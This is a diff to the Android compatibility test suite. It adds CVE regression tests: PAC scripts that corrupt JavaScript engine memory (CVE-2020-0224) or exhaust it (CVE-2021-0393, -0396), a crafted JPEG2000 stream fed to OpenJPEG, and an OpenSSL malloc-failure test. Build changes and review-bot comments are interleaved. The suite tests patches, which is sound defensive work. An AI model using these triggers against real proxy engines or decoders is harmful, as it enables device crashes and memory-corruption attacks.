WindowManagerIncidentTest.verifyWindowManagerServiceDumpProto(dump.getWindow(), filterLevel); 
diff --git a/hostsidetests/scopedstorage/Android.bp b/hostsidetests/scopedstorage/Android.bp index 480e2d3a8e4..44f4905b2de 100644 --- a/hostsidetests/scopedstorage/Android.bp +++ b/hostsidetests/scopedstorage/Android.bp @@ -19,7 +19,7 @@ android_test_helper_app { sdk_version: "test_current", srcs: ["ScopedStorageTestHelper/src/**/*.java"], // Tag as a CTS artifact - test_suites: ["device-tests", "mts", "cts"], + test_suites: ["device-tests", "mts-mediaprovider", "cts"], } android_test_helper_app { name: "CtsScopedStorageTestAppB", @@ -28,7 +28,7 @@ android_test_helper_app { sdk_version: "test_current", srcs: ["ScopedStorageTestHelper/src/**/*.java"], // Tag as a CTS artifact - test_suites: ["device-tests", "mts", "cts"], + test_suites: ["device-tests", "mts-mediaprovider", "cts"], } android_test_helper_app { name: "CtsScopedStorageTestAppC", @@ -37,7 +37,7 @@ android_test_helper_app { sdk_version: "test_current", srcs: ["ScopedStorageTestHelper/src/**/*.java"], // Tag as a CTS artifact - test_suites: ["device-tests", "mts", "cts"], + test_suites: ["device-tests", "mts-mediaprovider", "cts"], } android_test_helper_app { name: "CtsScopedStorageTestAppCLegacy", @@ -47,7 +47,7 @@ android_test_helper_app { target_sdk_version: "28", srcs: ["ScopedStorageTestHelper/src/**/*.java"], // Tag as a CTS artifact - test_suites: ["device-tests", "mts", "cts"], + test_suites: ["device-tests", "mts-mediaprovider", "cts"], } android_test_helper_app { name: "CtsScopedStorageTestAppDLegacy", @@ -57,7 +57,7 @@ android_test_helper_app { target_sdk_version: "28", srcs: ["ScopedStorageTestHelper/src/**/*.java"], // Tag as a CTS artifact - test_suites: ["device-tests", "mts", "cts"], + test_suites: ["device-tests", "mts-mediaprovider", "cts"], } android_test_helper_app { 
@@ -67,7 +67,7 @@ android_test_helper_app { sdk_version: "test_current", srcs: ["ScopedStorageTestHelper/src/**/*.java"], // Tag as a CTS artifact - test_suites: ["device-tests", "mts", "cts"], + test_suites: ["device-tests", "mts-mediaprovider", "cts"], } android_test { @@ -76,7 +76,7 @@ android_test { srcs: ["src/**/*.java"], static_libs: ["truth-prebuilt", "cts-scopedstorage-lib"], compile_multilib: "both", - test_suites: ["general-tests", "mts", "cts"], + test_suites: ["general-tests", "mts-mediaprovider", "cts"], sdk_version: "test_current", java_resources: [ ":CtsScopedStorageTestAppA", @@ -91,7 +91,7 @@ android_test { srcs: ["legacy/src/**/*.java"], static_libs: ["truth-prebuilt", "cts-scopedstorage-lib"], compile_multilib: "both", - test_suites: ["general-tests", "mts", "cts"], + test_suites: ["general-tests", "mts-mediaprovider", "cts"], sdk_version: "test_current", target_sdk_version: "29", java_resources: [ @@ -106,7 +106,7 @@ java_test_host { "host/src/android/scopedstorage/cts/host/BaseHostTestCase.java" ], libs: ["tradefed", "testng"], - test_suites: ["general-tests", "mts", "cts"], + test_suites: ["general-tests", "mts-mediaprovider", "cts"], test_config: "CoreTest.xml", } @@ -114,7 +114,7 @@ java_test_host { name: "CtsScopedStorageHostTest", srcs: ["host/src/**/*.java"], libs: ["tradefed", "testng"], - test_suites: ["general-tests", "mts", "cts"], + test_suites: ["general-tests", "mts-mediaprovider", "cts"], test_config: "AndroidTest.xml", } @@ -122,7 +122,7 @@ java_test_host { name: "CtsScopedStoragePublicVolumeHostTest", srcs: ["host/src/**/*.java"], libs: ["tradefed", "testng"], - test_suites: ["general-tests", "mts"], + test_suites: ["general-tests", "mts-mediaprovider"], test_config: "PublicVolumeTest.xml", } 
@@ -133,7 +133,7 @@ android_test { srcs: ["device/**/*.java"], static_libs: ["truth-prebuilt", "cts-scopedstorage-lib"], compile_multilib: "both", - test_suites: ["device-tests", "mts", "cts"], + test_suites: ["device-tests", "mts-mediaprovider", "cts"], sdk_version: "test_current", libs: ["android.test.base", "android.test.mock", "android.test.runner",], java_resources: [ diff --git a/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java b/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java index 966f96d82c3..81d40d2d14a 100644 --- a/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java +++ b/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java @@ -211,7 +211,8 @@ public class ScopedStorageDeviceTest extends ScopedStorageBaseDeviceTest { @Parameter(0) public String mVolumeName; - @Parameters + /** Parameters data. */ + @Parameters(name = "volume={0}") public static Iterable<? extends Object> data() { return ScopedStorageDeviceTest.getTestParameters(); } 
@@ -1536,6 +1537,39 @@ public class ScopedStorageDeviceTest extends ScopedStorageBaseDeviceTest { } /** + * Test that ScanFile() after renaming file extension updates the right + * MIME type from the file metadata. + */ + @Test + public void testScanUpdatesMimeTypeForRenameFileExtension() throws Exception { + final String audioFileName = "ScopedStorageDeviceTest_" + NONCE; + final File mpegFile = new File(getMusicDir(), audioFileName + ".mp3"); + final File nonMpegFile = new File(getMusicDir(), audioFileName + ".snd"); + try { + // Copy audio content to mpegFile + try (InputStream in = + getContext().getResources().openRawResource(R.raw.test_audio); + FileOutputStream out = new FileOutputStream(mpegFile)) { + FileUtils.copy(in, out); + out.getFD().sync(); + } + assertThat(MediaStore.scanFile(getContentResolver(), mpegFile)).isNotNull(); + assertThat(getFileMimeTypeFromDatabase(mpegFile)).isEqualTo("audio/mpeg"); + + // This rename changes MIME type from audio/mpeg to audio/basic + assertCanRenameFile(mpegFile, nonMpegFile); + assertThat(getFileMimeTypeFromDatabase(nonMpegFile)).isNotEqualTo("audio/mpeg"); + + assertThat(MediaStore.scanFile(getContentResolver(), nonMpegFile)).isNotNull(); + // Above scan should read file metadata and update the MIME type to audio/mpeg + assertThat(getFileMimeTypeFromDatabase(nonMpegFile)).isEqualTo("audio/mpeg"); + } finally { + mpegFile.delete(); + nonMpegFile.delete(); + } + } + + /** * Test that app without write permission for file can't update the file. */ @Test diff --git a/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java b/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java index 80a90c18b10..19d521d010d 100644 --- a/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java 
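Review bot: In `testScanUpdatesMimeTypeForRenameFileExtension` the comment before `assertCanRenameFile(mpegFile, nonMpegFile)` says the rename changes the MIME type to audio/basic, but the assertion after it only checks `isNotEqualTo("audio/mpeg")`. If the weaker check is deliberate because the `.snd` mapping may differ between devices, reword the comment to match, for example `// After the rename the stored MIME type follows the new extension and must no longer be audio/mpeg`. The `finally` block also discards the results of `mpegFile.delete()` and `nonMpegFile.delete()`, so a file left behind on one volume would pass unnoticed.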
+++ b/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java @@ -823,7 +823,7 @@ public class TestUtils { */ public static void assertDirectoryContains(@NonNull File dir, File... expectedContent) { assertThat(dir.isDirectory()).isTrue(); - assertThat(Arrays.asList(dir.listFiles())).containsAllIn(expectedContent); + assertThat(Arrays.asList(dir.listFiles())).containsAtLeastElementsIn(expectedContent); } public static File getExternalStorageDir() { diff --git a/hostsidetests/scopedstorage/res/raw/test_audio.mp3 b/hostsidetests/scopedstorage/res/raw/test_audio.mp3 Binary files differnew file mode 100644 index 00000000000..4fe9228331d --- /dev/null +++ b/hostsidetests/scopedstorage/res/raw/test_audio.mp3 diff --git a/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java b/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java index de90629d340..b63e4ca75c9 100644 --- a/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java +++ b/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java @@ -222,6 +222,8 @@ public class SELinuxHostTest extends DeviceTestCase implements IBuildReceiver, I File systemSepolicyCilFile = File.createTempFile("plat_sepolicy", ".cil"); systemSepolicyCilFile.deleteOnExit(); + File fileContextsFile = File.createTempFile("file_contexts", ".txt"); + fileContextsFile.deleteOnExit(); assertTrue(device.pullFile("/system/etc/selinux/plat_sepolicy.cil", systemSepolicyCilFile)); @@ -229,6 +231,7 @@ public class SELinuxHostTest extends DeviceTestCase implements IBuildReceiver, I secilc.getAbsolutePath(), "-m", "-M", "true", "-c", "30", "-o", builtPolicyFile.getAbsolutePath(), + "-f", fileContextsFile.getAbsolutePath(), systemSepolicyCilFile.getAbsolutePath()); pb.redirectOutput(ProcessBuilder.Redirect.PIPE); pb.redirectErrorStream(true); 
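Review bot: Neither SELinuxHostTest hunk explains why secilc is now given `-f` with a temp file that nothing reads afterwards. Without `-f`, secilc writes its file_contexts output to a default path in the working directory, so this looks like a way to keep the host directory clean. A one-line comment above the `File.createTempFile("file_contexts", ".txt")` call would record that, e.g. `// secilc always emits file_contexts; send it to a temp file instead of the current directory`. The enclosing method starts and ends outside both hunks, so the rest of the process handling is not visible here.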
diff --git a/hostsidetests/securitybulletin/Android.bp b/hostsidetests/securitybulletin/Android.bp index f17395ee944..49c5dfddd11 100644 --- a/hostsidetests/securitybulletin/Android.bp +++ b/hostsidetests/securitybulletin/Android.bp @@ -37,11 +37,12 @@ cc_defaults { compile_multilib: "both", multilib: { lib32: { - suffix: "32", + suffix: "_sts32", }, lib64: { - suffix: "64", + suffix: "_sts64", }, + // build/soong/common/arch.go default returns nil; no default possible }, arch: { arm: { diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml index a6b5c79b0fc..bd55c9b0097 100644 --- a/hostsidetests/securitybulletin/AndroidTest.xml +++ b/hostsidetests/securitybulletin/AndroidTest.xml @@ -27,7 +27,6 @@ <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller"> <option name="cleanup-apks" value="true" /> - <option name="test-file-name" value="OomCatcher.apk" /> <option name="test-file-name" value="MainlineModuleDetector.apk" /> <option name="test-file-name" value="hotspot.apk" /> </target_preparer> diff --git a/hostsidetests/securitybulletin/res/cve_2020_0224.pac b/hostsidetests/securitybulletin/res/cve_2020_0224.pac new file mode 100644 index 00000000000..6b8f6895d24 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0224.pac 
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+function gc() {
+ for (let i = 0; i < 0x10; i++)
+ new ArrayBuffer(0x800000);
+}
+function to_dict(obj) {
+obj.__defineGetter__('x',()=>2);
+obj.__defineGetter__('x',()=>2);
+}
+function fk() {
+rgx = null;
+dbl_arr = [1.1, 2.2, 3.3, 4.4];
+o = {};
+o.__defineGetter__("length", ()=> {
+ rgx = new RegExp(/AAAAAAAA/y);
+ return 2;
+ });
+o[0] = "aaaa";
+o.__defineGetter__(1, ()=> {
+ for (let i=0;i<8;i++) dbl_arr.push(5.5);
+
+ let cnt = 0;
+ rgx[Symbol.replace]("AAAAAAAA", {
+ toString: ()=> {
+ cnt++;
+ if (cnt == 2) {
+ rgx.lastIndex = {valueOf: ()=> {
+ to_dict(rgx);
+ gc();
+ return 0;
+ }};
+
+ }
+
+ return 'BBBB$';
+ }
+ });
+ return "bbbb";
+ });
+p = new Proxy( {}, {
+ ownKeys: function(target) {
+ return o;
+ },
+ getOwnPropertyDescriptor(target, prop) {
+ return {configurable: true, enumerable: true, value: 5};
+ }
+ });
+
+Object.keys(p);
+alert (dbl_arr[0]);
+if (dbl_arr[0] == 1.1) {
+ fail("failed to corrupt dbl_arr");
+}
+}
+
+function FindProxyForURL(url, host) {
+fk();
+return "DIRECT";
+}
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0383.info b/hostsidetests/securitybulletin/res/cve_2020_0383.info Binary files differnew file mode 100644
index 00000000000..175c47c9f57
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0383.info
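Review bot: This PAC resource, like cve_2021_0393.pac and cve_2021_0396.pac added after it, has no comment naming the host test that loads it or the outcome expected on a patched build. A short header under the licence would make a failure easier to triage, for example `// Regression input for CVE-2020-0224; a fixed PAC engine is expected to evaluate this without crashing the process` (the expectation is inferred and should be confirmed against the test). In `fk()` the names `rgx`, `dbl_arr`, `o` and `p` are assigned without `let` or `var`. `fail` is not defined anywhere in the file, so the final branch would surface as a ReferenceError unless the harness supplies `fail`; a comment saying which is intended would help.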
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0383.xmf b/hostsidetests/securitybulletin/res/cve_2020_0383.xmf Binary files differnew file mode 100644 index 00000000000..921efe1eb38 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0383.xmf diff --git a/hostsidetests/securitybulletin/res/cve_2021_0393.pac b/hostsidetests/securitybulletin/res/cve_2021_0393.pac new file mode 100644 index 00000000000..42038b61549 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2021_0393.pac @@ -0,0 +1,22 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +function FindProxyForURL(url, host) { + let s = String.fromCharCode(0x4141).repeat(0x10000001) + "A"; + s = "'" + s + "'"; + eval(s); + return "DIRECT"; +} diff --git a/hostsidetests/securitybulletin/res/cve_2021_0396.pac b/hostsidetests/securitybulletin/res/cve_2021_0396.pac new file mode 100644 index 00000000000..5677445a03b --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2021_0396.pac 
@@ -0,0 +1,23 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +function FindProxyForURL(url, host){ + var evil_call = eval("(function(" + Array(65535).fill("x").join(",") + "){})"); + f(evil_call()); + return "DIRECT"; +} + +function f(){} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp index 6f087cc64a7..10bbf66d052 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp @@ -26,9 +26,6 @@ cc_test { "frameworks/av/media/libmedia/include", ], multilib: { - lib32: { - suffix: "32", - }, lib64: { shared_libs: [ "libstagefright", @@ -37,7 +34,6 @@ cc_test { "libstagefright_foundation", "libdatasource", ], - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/Android.bp new file mode 100644 index 00000000000..9a853179387 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/Android.bp 
@@ -0,0 +1,27 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE-2016-2182",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libcrypto",
+ "libssl",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/poc.cpp
new file mode 100644
index 00000000000..78e1e732fea
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/poc.cpp
@@ -0,0 +1,138 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <dlfcn.h> +#include <string.h> +#include <openssl/ssl.h> +#include <openssl/crypto.h> +#include <openssl/bn.h> +#include <memory> +#include "../includes/common.h" + +/** NOTE: These values are for the BIGNUM declared in kBN2DecTests and */ +/** must be updated if kBN2DecTests is changed. */ +#if _32_BIT +#define ALLOCATION_SIZE 52 +static const int sMallocSkipCount[] = {1,0}; +#else +#define ALLOCATION_SIZE 56 +static const int sMallocSkipCount[] = {0,0}; +#endif + +static const char *kTest = + "123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"; + +static int sCount = 0; +static bool sOverloadMalloc = false; +int loopIndex = 0; + +template<typename T> +struct OpenSSLFree { + void operator()(T *buf) { + OPENSSL_free(buf); + } +}; + +using ScopedOpenSSLString = std::unique_ptr<char, OpenSSLFree<char>>; + +namespace crypto { +template<typename T, void (*func)(T*)> +struct OpenSSLDeleter { + void operator()(T *obj) { + func(obj); + } +}; + +template<typename Type, void (*Destroyer)(Type*)> +struct OpenSSLDestroyer { + void operator()(Type* ptr) const { + Destroyer(ptr); + } +}; + +template<typename T, void (*func)(T*)> +using ScopedOpenSSLType = std::unique_ptr<T, OpenSSLDeleter<T, func>>; + +template<typename PointerType, void (*Destroyer)(PointerType*)> +using ScopedOpenSSL = 
+std::unique_ptr<PointerType, OpenSSLDestroyer<PointerType, Destroyer>>; + +struct OpenSSLFree { + void operator()(uint8_t* ptr) const { + OPENSSL_free(ptr); + } +}; + +using ScopedBIGNUM = ScopedOpenSSL<BIGNUM, BN_free>; +using ScopedBN_CTX = ScopedOpenSSLType<BN_CTX, BN_CTX_free>; +} // namespace crypto + +static int DecimalToBIGNUM(crypto::ScopedBIGNUM *out, const char *in) { + BIGNUM *raw = nullptr; + int ret = BN_dec2bn(&raw, in); + out->reset(raw); + return ret; +} + +void* (*realMalloc)(size_t) = nullptr; + +void mtraceInit(void) { + realMalloc = (void *(*)(size_t))dlsym(RTLD_NEXT, "malloc"); + return; +} + +void *malloc(size_t size) { + if (realMalloc == nullptr) { + mtraceInit(); + } + if (!sOverloadMalloc) { + return realMalloc(size); + } + if (size == ALLOCATION_SIZE) { + if (sCount >= sMallocSkipCount[loopIndex]) { + return nullptr; + } + ++sCount; + } + return realMalloc(size); +} + +using namespace crypto; + +int main() { + CRYPTO_library_init(); + ScopedBN_CTX ctx(BN_CTX_new()); + if (!ctx) { + return EXIT_FAILURE; + } + for(loopIndex = 0; loopIndex < 2; ++loopIndex) { + ScopedBIGNUM bn; + int ret = DecimalToBIGNUM(&bn, kTest); + if (!ret) { + return EXIT_FAILURE; + } + sOverloadMalloc = true; + ScopedOpenSSLString dec(BN_bn2dec(bn.get())); + sOverloadMalloc = false; + if (!dec) { + return EXIT_FAILURE; + } + if (strcmp(dec.get(), kTest)) { + return EXIT_FAILURE; + } + } + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp index c2b7636bb79..630cb39bc3e 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp @@ -39,10 +39,6 @@ cc_test { "android.hidl.allocator@1.0", "android.hardware.media.omx@1.0", ], - suffix: "32", - }, - lib64: { - suffix: "64", }, }, } 
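Review bot: The NOTE above `ALLOCATION_SIZE` refers to `kBN2DecTests`, but this file declares the decimal string as `kTest`, so the comment points at a name that does not exist here. It should read something like `/** NOTE: These values are for the BIGNUM parsed from kTest and must be updated if kTest is changed. */`. The interposed `malloc` resolves `realMalloc` through `dlsym` on first use; if `dlsym` itself allocates, that call re-enters `malloc` with `realMalloc` still null, so a re-entry guard is worth considering. `crypto::OpenSSLDeleter` and `crypto::OpenSSLDestroyer` are identical apart from `const`, and `crypto::OpenSSLFree` is unused, so one deleter template would do. This hunk begins on the previous line of the page.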
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/Android.bp
new file mode 100644
index 00000000000..bbe6c7bab0c
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/Android.bp
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE-2016-8332",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.c",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ shared_libs: [
+ "libpdfium",
+ ],
+ include_dirs: [
+ "external/pdfium/third_party/libopenjpeg20",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/poc.c
new file mode 100644
index 00000000000..86cbaec9050
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/poc.c
@@ -0,0 +1,141 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +#define _GNU_SOURCE +#include <sys/types.h> +#include <sys/wait.h> +#include <string.h> +#include <stdlib.h> +#include "openjpeg.h" +#include "opj_includes.h" + +#define REPEATVALUES 100000 + +unsigned char gStartValues[] = { 0xFF, 0x4F, 0xFF, 0x51, 0x00, 0x2F, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x2E, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x07, 0x01, + 0x01, 0x07, 0x01, 0x01, 0x07, 0x01, 0x01, 0xFF, 0x64, 0x00, 0x23, 0x00, + 0x01, 0x43, 0x72, 0x65, 0x61, 0x74, 0x6F, 0x72, 0x3A, 0x20, 0x4A, 0x61, + 0x73, 0x50, 0x65, 0x72, 0x20, 0x56, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E, + 0x20, 0x31, 0x2E, 0x37, 0x30, 0x30, 0x2E, 0x31, 0xFF, 0x52, 0x00, 0x0C, + 0x00, 0x00, 0x00, 0x01, 0x01, 0x05, 0x04, 0x04, 0x00, 0x01, 0xFF, 0x5C, + 0x00, 0x13, 0x40, 0x40, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, + 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0xFF, 0x5D, 0x00, 0x14, 0x01, + 0x40, 0x40, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, + 0x48, 0x50, 0x48, 0x48, 0x50, 0xFF, 0x5D, 0x00, 0x14, 0x02, 0x40, 0x40, + 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, + 0x48, 0x48, 0x50 }; +unsigned int gNumStartValues = sizeof(gStartValues) / sizeof(gStartValues[0]); + +unsigned 
char gRepeatValues[] = { 0xFF, 0x75, 0x00, 0x09, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00 }; +unsigned int gNumRepeatValues = sizeof(gRepeatValues) + / sizeof(gRepeatValues[0]); + +unsigned char gLastValues[] = { 0xFF, 0x75, 0x00, 0x09, 0x00, 0x00, 0x01, 0x00, + 0x00, 0x00, 0x00 }; +unsigned int gNumLastValues = sizeof(gLastValues) / sizeof(gLastValues[0]); + +typedef struct { + char* blob; + ssize_t blobSize; + ssize_t readPos; +} applicationContext; + +opj_stream_t* allocate_stream(void) { + opj_stream_private_t * stream = NULL; + + stream = (opj_stream_private_t*) opj_calloc(1, sizeof(opj_stream_private_t)); + if (!stream) { + return NULL; + } + + stream->m_buffer_size = OPJ_J2K_STREAM_CHUNK_SIZE; + stream->m_stored_data = (OPJ_BYTE *) opj_malloc(OPJ_J2K_STREAM_CHUNK_SIZE); + if (!stream->m_stored_data) { + opj_free(stream); + return NULL; + } + + stream->m_current_data = stream->m_stored_data; + stream->m_status |= OPJ_STREAM_STATUS_INPUT; + stream->m_opj_skip = opj_stream_read_skip; + stream->m_opj_seek = opj_stream_read_seek; + stream->m_read_fn = opj_stream_default_read; + stream->m_write_fn = opj_stream_default_write; + stream->m_skip_fn = opj_stream_default_skip; + stream->m_seek_fn = opj_stream_default_seek; + + return (opj_stream_t *) stream; +} + +static OPJ_SIZE_T ReadHandler(void *buffer, OPJ_SIZE_T length, void *context) { + applicationContext* appContext = (applicationContext*) context; + ssize_t count = 0; + ssize_t rem = 0; + if (!appContext) { + return ((OPJ_SIZE_T) - 1); + } + rem = appContext->blobSize - appContext->readPos; + if ((ssize_t) length <= rem) { + count = length; + } else { + count = rem; + } + memcpy(buffer, &appContext->blob[appContext->readPos], count); + appContext->readPos += count; + return ((OPJ_SIZE_T) length); +} + +int main(void) { + ssize_t offset = 0; + unsigned int count = 0; + applicationContext sContext; + opj_j2k_t* codec = NULL; + opj_stream_t* stream = NULL; + opj_image_t* image = NULL; + opj_stream_private_t* 
private = NULL; + opj_event_mgr_t eventMgr; + stream = allocate_stream(); + private = (opj_stream_private_t*)stream; + + sContext.blobSize = gNumStartValues + REPEATVALUES * gNumRepeatValues + + gNumLastValues; + sContext.blob = (char*) opj_malloc(sContext.blobSize); + if (!sContext.blob) { + return EXIT_FAILURE; + } + memset(sContext.blob, 0, sContext.blobSize); + + memcpy(&sContext.blob[offset], gStartValues, gNumStartValues); + offset += gNumStartValues; + for (count = 0; count < REPEATVALUES; ++count) { + memcpy(&sContext.blob[offset], gRepeatValues, gNumRepeatValues); + offset += gNumRepeatValues; + } + memcpy(&sContext.blob[offset], gLastValues, gNumLastValues); + offset += gNumLastValues; + sContext.readPos = 0; + private->m_read_fn = ReadHandler; + private->m_user_data = (void*)&sContext; + private->m_user_data_length = sContext.blobSize; + private->m_free_user_data_fn = NULL; + codec = opj_j2k_create_decompress(); + opj_set_default_event_handler(&eventMgr); + opj_j2k_read_header(private,codec,&image,&eventMgr); + opj_free(sContext.blob); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp index 213958373f2..a3928d7a57a 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp @@ -39,10 +39,6 @@ cc_test { "android.hidl.allocator@1.0", "android.hardware.media.omx@1.0", ], - suffix: "32", - }, - lib64: { - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/Android.bp new file mode 100644 index 00000000000..9b478eb8340 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/Android.bp 
